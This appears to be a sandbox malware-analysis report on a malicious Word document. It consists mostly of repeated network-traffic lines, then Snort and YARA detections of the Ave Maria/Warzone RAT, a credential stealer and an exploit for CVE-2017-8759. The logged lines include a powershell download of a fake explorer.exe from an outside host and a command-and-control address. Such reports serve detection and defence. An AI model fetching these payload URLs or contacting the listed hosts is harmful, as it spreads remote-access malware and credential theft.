          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficDNS query: name: login.929389.ankura.us
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 159.223.2.212:80

          Networking

          barindex
          Source: TrafficSnort IDS: 2852326 ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket 20.126.95.155:7800 -> 192.168.2.22:49173
          Source: TrafficSnort IDS: 2036735 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 20.126.95.155:7800 -> 192.168.2.22:49173
          Source: TrafficSnort IDS: 2852327 ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse 192.168.2.22:49173 -> 20.126.95.155:7800
          Source: TrafficSnort IDS: 2036734 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin 192.168.2.22:49173 -> 20.126.95.155:7800
          Source: TrafficSnort IDS: 2852329 ETPRO TROJAN Ave Maria/Warzone RAT PingCommand 20.126.95.155:7800 -> 192.168.2.22:49173
          Source: TrafficSnort IDS: 2852328 ETPRO TROJAN Ave Maria/Warzone RAT PingResponse 192.168.2.22:49173 -> 20.126.95.155:7800
          Source: Malware configuration extractorURLs: 20.126.95.155
          Source: global trafficHTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Host: login.929389.ankura.usConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: login.929389.ankura.usConnection: Keep-Alive
          Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
          Source: Joe Sandbox ViewASN Name: CELANESE-US CELANESE-US
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 20.126.95.155:7800
          Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httP://login.929
          Source: powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httP://login.929389.ank
          Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httP://login.929389.ankura.us/Aw
          Source: powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httP://login.929389.ankura.us/AwOgYiWG/explorer.exe
          Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httP://login.929389.ankura.us/AwOgYiWG/explorer.exePE
          Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.922726566.00000000035E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://login.929389.ankura.us
          Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.926952704.000000001B39C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login.929389.ankura.us/AwOgYiWG/explorer.exe
          Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032698870.000000000289A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9CEE7D2D-9EE4-4FEB-932A-E7FDD2AB9079}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: login.929389.ankura.us
          Source: unknownTCP traffic detected without corresponding DNS query: 20.126.95.155
          Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputData

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, type: SAMPLEMatched rule: detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents. Author: ditekSHen
          Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
